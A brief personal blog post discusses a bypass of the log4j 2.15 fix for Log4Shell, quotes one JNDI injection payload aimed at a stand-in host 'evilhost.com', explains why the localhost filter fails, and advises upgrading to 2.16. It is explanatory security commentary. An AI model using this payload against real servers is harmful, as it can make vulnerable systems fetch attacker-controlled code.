Log4Shell part two

I did not have much time to get to the log4j exploitation part. There are quite some interesting way to make use of the JDNI feature. Just yesterday, another improvement of it has been discovered.

With the version 2.15 of log4j, they changed the behavior of the lookup() function to be restricted. However, this can be bypassed.

The bypass was posted yesterday morning by Márcio Almeida on Twitter:

${jndi:ldap://127.0.0.1#evilhost.com:1389/a}

He explains how it works because while the java.net.URI getHost() resolves localhost, the lookup() function of log4j will still try to resolve the completed URL with the shebang. Hence, it still will try to connect to the evilhost. I think it is because the LDAP resolve effectively again and therefor bypass the localhost filter.

This confirms the initial suspicion of the Luna sec guys. Besides of this, the mitigation does not only work, it also points to the core fact, that the vulnerability remains usable in the fix in scope of a corner-cases: When using the Thread Context Map. It is a feature for multithreading, I think, and there the mitigation does not work. The only solution is to update to 2.16 where the JDNI feature has been completely removed. Something that make more sense even now.

best regards,
akendo